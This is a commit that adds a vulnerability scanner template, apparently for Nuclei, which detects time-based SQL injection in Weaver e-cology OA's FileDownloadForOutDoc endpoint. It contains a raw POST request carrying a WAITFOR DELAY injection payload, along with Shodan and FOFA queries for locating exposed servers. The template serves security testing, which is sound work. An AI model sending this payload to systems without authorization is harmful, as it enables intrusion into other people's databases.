Create ecology-oa-file-sqli.yaml

http/vulnerabilities/other/ecology-oa-file-sqli.yaml

@@ -0,0 +1,32 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: e-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}      
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:5'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+          - 'contains(set_cookie, "ecology_JSessionid=")'
+        condition: and